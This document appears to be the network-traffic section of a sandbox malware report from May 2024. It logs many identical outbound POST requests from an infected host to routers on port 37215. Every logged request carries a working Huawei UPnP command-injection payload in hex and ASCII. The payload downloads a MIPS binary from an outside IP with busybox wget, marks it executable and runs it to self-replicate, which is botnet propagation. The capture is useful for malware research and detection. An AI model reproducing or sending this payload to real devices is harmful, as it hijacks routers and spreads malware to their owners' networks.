                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2332192.168.2.235756841.200.92.12137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.588367939 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2333192.168.2.2349056148.25.107.22137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.588393927 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2334192.168.2.235353841.253.240.20037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.588439941 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2335192.168.2.2336744157.101.15.7837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.588460922 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2336192.168.2.2351202197.205.90.23237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.588502884 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2337192.168.2.2355266197.8.189.5937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.588687897 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2338192.168.2.2353664197.120.207.12237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.588690042 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2339192.168.2.2354344157.142.149.24137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.588834047 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2340192.168.2.2353938181.236.178.3537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.589149952 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2341192.168.2.233416861.184.136.11337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.589981079 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
